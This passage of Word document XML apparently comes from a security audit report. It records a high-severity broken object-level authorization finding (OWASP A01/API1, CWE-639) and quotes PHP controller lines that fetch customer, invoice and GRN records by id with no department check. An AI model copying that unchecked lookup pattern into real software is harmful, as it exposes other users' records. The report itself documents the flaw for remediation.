                        <w:r w:rsidRPr="00CA733A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>OWASP</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 853" o:spid="_x0000_s1100" style="position:absolute;left:4418;width:2167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2BB20BCC" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> A01:2021 / API1:2023 BOLA · </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 854" o:spid="_x0000_s1101" style="position:absolute;left:20716;width:684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687B53B8" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00CA733A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>CWE-639</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 855" o:spid="_x0000_s1102" style="position:absolute;left:25861;width:140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5E47A60A" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> · </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 856" o:spid="_x0000_s1103" style="position:absolute;left:26917;width:350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7DB9B28F" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00CA733A">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="auto"/>
                          </w:rPr>
                          <w:t>High</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 857" o:spid="_x0000_s1104" style="position:absolute;top:2667;width:7369;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58040B7D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t>Evidence.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 858" o:spid="_x0000_s1105" style="position:absolute;left:5542;top:2667;width:491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2E3997D9" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> Every </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 859" o:spid="_x0000_s1106" style="position:absolute;left:9239;top:2483;width:2857;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="285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IkhxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvQv/D8gq9mU0rio2uUgRpe2ioNr0/ss8kNPs27K4m+fduQfA4zMw3zHo7mFZcyPnGsoLnJAVB&#10;XFrdcKWg+NlPlyB8QNbYWiYFI3nYbh4ma8y07flAl2OoRISwz1BBHUKXSenLmgz6xHbE0TtZZzBE&#10;6SqpHfYRblr5kqYLabDhuFBjR7uayr/j2SjQfTUL7y7/5YMuPvOvdvye6Z1ST4/D2wpEoCHcw7f2&#10;h1awnL/C/5l4BOTmCgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFUoiSHEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l276225,v2630,,4875,930,6735,2791c284820,4645,285750,6893,285750,9525r,114300c285750,126451,284820,128699,282960,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126451,,123825l,9525c,6893,930,4645,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,285750,133350"/>
                </v:shape>
                <v:rect id="Rectangle 25471" o:spid="_x0000_s1107" style="position:absolute;left:9505;top:2719;width:77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o3IxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5Qm91Y1SrYmuIlrRY6tC9PbIPpPQ7NuQ3Zror+8WhB6HmfmGmS06U4krNa60rGDQj0AQ&#10;Z1aXnCs4HjavExDOI2usLJOCGzlYzJ+fZpho2/IXXfc+FwHCLkEFhfd1IqXLCjLo+rYmDt7FNgZ9&#10;kE0udYNtgJtKDqNoLA2WHBYKrGlVUPa9/zEKtpN6edrZe5tXH+dt+pnG60PslXrpdcspCE+d/w8/&#10;2jutYDh6ex/A351wBeT8FwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAHmjcjHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="728326B6" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>{</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25473" o:spid="_x0000_s1108" style="position:absolute;left:10088;top:2719;width:1550;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YkxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvhX6H5RW81Y1aq0ZXkVrRo/9AvT2yzyQ0+zZkVxP76d2C0OMwM79hJrPGFOJGlcstK+i0IxDE&#10;idU5pwoO++X7EITzyBoLy6TgTg5m09eXCcba1ryl286nIkDYxagg876MpXRJRgZd25bEwbvYyqAP&#10;skqlrrAOcFPIbhR9SoM5h4UMS/rKKPnZXY2C1bCcn9b2t06L7/PquDmOFvuRV6r11szHIDw1/j/8&#10;bK+1gm7/Y9CDvzvhCsjpAwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJ54tiTHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2C710DE1" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>id</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25472" o:spid="_x0000_s1109" style="position:absolute;left:11254;top:2719;width:77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O/xwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvQr/D8gq96aahWo2uIv5Bj1YLtrdH9pmEZt+G7Gqin94VhB6HmfkNM5m1phQXql1hWcF7LwJB&#10;nFpdcKbg+7DuDkE4j6yxtEwKruRgNn3pTDDRtuEvuux9JgKEXYIKcu+rREqX5mTQ9WxFHLyTrQ36&#10;IOtM6hqbADeljKNoIA0WHBZyrGiRU/q3PxsFm2E1/9naW5OVq9/NcXccLQ8jr9Tbazsfg/DU+v/w&#10;s73VCuL+x2cMjzvhCsjpHQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPE0E7/HAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="082E2AA9" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>}</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 861" o:spid="_x0000_s1110" style="position:absolute;left:12107;top:2667;width:28074;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6E275887" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> handler was a bare primary-key lookup:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 862" o:spid="_x0000_s1111" style="position:absolute;left:1007;top:6605;width:4998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767C29A7" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">CustomerController.php:101   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>Customer::</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>with('department')-&gt;find($id);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 863" o:spid="_x0000_s1112" style="position:absolute;left:1007;top:8319;width:4418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1456DA31" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">InvoiceController.php:229    </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>Invoice::</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>with([...])-&gt;find($id);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 864" o:spid="_x0000_s1113" style="position:absolute;left:1007;top:10034;width:4128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62FD3A47" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">GrnController.php:207        </w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>Grn</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with([...])-&gt;find($id);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 865" o:spid="_x0000_s1114" style="position:absolute;top:13716;width:982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27B1A3A4" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Users carry a </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 866" o:spid="_x0000_s1115" style="position:absolute;left:7429;top:13532;width:8096;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8096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gexQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6kYPIY2uQUSh9iAYhfb4zL4modm3IbuJaX99VxB6HGbmG2aVjaYRA3WutqxgPotA&#10;EBdW11wquJz3LwkI55E1NpZJwQ85yNaTpxWm2t74REPuSxEg7FJUUHnfplK6oiKDbmZb4uB92c6g&#10;D7Irpe7wFuCmkYsoiqXBmsNChS1tKyq+894o+GgOJz/ku8Px+Gno+vuevPZjodTzdNwsQXga/X/4&#10;0X7TCpI4hvuZcATk+g8AAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDEa0gexQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l800100,v2630,,4875,930,6735,2791c808695,4645,809625,6893,809625,9525r,123825c809625,135976,808695,138224,806835,140084v-1860,1855,-4105,2785,-6735,2791l9525,142875v-2630,-6,-4875,-936,-6735,-2791c930,138224,,135976,,133350l,9525c,6893,930,4645,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,809625,142875"/>
                </v:shape>
                <v:rect id="Rectangle 867" o:spid="_x0000_s1116" style="position:absolute;left:7655;top:13768;width:10078;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64DF88FE" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>department_id</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 868" o:spid="_x0000_s1117" style="position:absolute;left:15503;top:13716;width:964;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6E975DE0" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> (</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 869" o:spid="_x0000_s1118" style="position:absolute;left:16192;top:13532;width:6953;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6953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EhRxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/disIw&#10;FITvBd8hHGHvNFVUtBpFBGVFBf/w+tAc22JzUpusdt/eCAt7OczMN8x0XptCPKlyuWUF3U4Egjix&#10;OudUweW8ao9AOI+ssbBMCn7JwXzWbEwx1vbFR3qefCoChF2MCjLvy1hKl2Rk0HVsSRy8m60M+iCr&#10;VOoKXwFuCtmLoqE0mHNYyLCkZUbJ/fRjFNx2i4G+9x/JYWPlZp1v99fBXiv11aoXExCeav8f/mt/&#10;awWj4Rg+Z8IRkLM3AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAAlkSFHEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l685800,v2630,,4875,930,6735,2791c694395,4645,695325,6893,695325,9525r,123825c695325,135976,694395,138224,692535,140084v-1860,1855,-4105,2785,-6735,2791l9525,142875v-2630,-6,-4875,-936,-6735,-2791c930,138224,,135976,,133350l,9525c,6893,930,4645,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,695325,142875"/>
                </v:shape>
                <v:rect id="Rectangle 870" o:spid="_x0000_s1119" style="position:absolute;left:16499;top:13768;width:852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3FF93FE7" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>User.php:24</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25477" o:spid="_x0000_s1120" style="position:absolute;left:35716;top:13715;width:525;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7AnyAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvuqnYaqKrSG3Ro8ZC6u2RfU1Cs29DdmvS/vpuQfA4zMw3zGrTm1pcqXWVZQWPkwgE&#10;cW51xYWC9/PbeAHCeWSNtWVS8EMONuvhYIWJth2f6Jr6QgQIuwQVlN43iZQuL8mgm9iGOHiftjXo&#10;g2wLqVvsAtzUchpFz9JgxWGhxIZeSsq/0m+jYL9oth8H+9sV9etlnx2zeHeOvVIPo367BOGp9/fw&#10;rX3QCqZPs/kc/u+EKyDXfwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDhQ7AnyAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="58155F8D" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t>(</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25475" o:spid="_x0000_s1121" style="position:absolute;left:23181;top:13715;width:52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LyAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvuqloNdFVpLboUWMh9fbIviah2bchuzVpf323UPA4zMw3zHrbm1rcqHWVZQWPkwgE&#10;cW51xYWCt8vreAnCeWSNtWVS8E0OtpvhYI2Jth2f6Zb6QgQIuwQVlN43iZQuL8mgm9iGOHgftjXo&#10;g2wLqVvsAtzUchpFT9JgxWGhxIaeS8o/0y+j4LBsdu9H+9MV9cv1kJ2yeH+JvVIPo363AuGp9/fw&#10;f/uoFUzns8Uc/u6EKyA3vwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQB+3YvLyAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="46FF8DDF" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t>)</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25478" o:spid="_x0000_s1122" style="position:absolute;left:23576;top:13715;width:1614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CRVxAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0P+A/hCu7GVHF8VKOIzqDL8QHq7tJc22JzU5poO369WQizPJz3bNGYQjyocrllBb1uBII4sTrn&#10;VMHx8PM5BuE8ssbCMin4IweLeetjhrG2Ne/osfepCCHsYlSQeV/GUrokI4Oua0viwF1tZdAHWKVS&#10;V1iHcFPIfhQNpcGcQ0OGJa0ySm77u1GwGZfL89Y+67T4vmxOv6fJ+jDxSnXazXIKwlPj/8Vv91Yr&#10;6H8NRmFvuBOugJy/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJDcJFXEAAAA3gAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="54F28232" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> and so do the records </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 872" o:spid="_x0000_s1123" style="position:absolute;left:36099;top:13532;width:8668;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8667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kxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvhX6H8Aq91Ww9qGyNUgoFab34p4feHpvXzermZUle3fXbG0HwOMzMb5j5cvCtOlFMTWADr6MC&#10;FHEVbMO1gf3u82UGKgmyxTYwGThTguXi8WGOpQ09b+i0lVplCKcSDTiRrtQ6VY48plHoiLP3F6JH&#10;yTLW2kbsM9y3elwUE+2x4bzgsKMPR9Vx++8NFN+/P25yFLv+sufYh+qwauRgzPPT8P4GSmiQe/jW&#10;XlkDs+kYrmfyEdCLCwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD5ZE/kxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l857250,v2630,,4875,930,6735,2791c865845,4645,866775,6893,866775,9525r,123825c866775,135976,865845,138224,863985,140084v-1860,1855,-4105,2785,-6735,2791l9525,142875v-2630,-6,-4875,-936,-6735,-2791c930,138224,,135976,,133350l,9525c,6893,930,4645,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
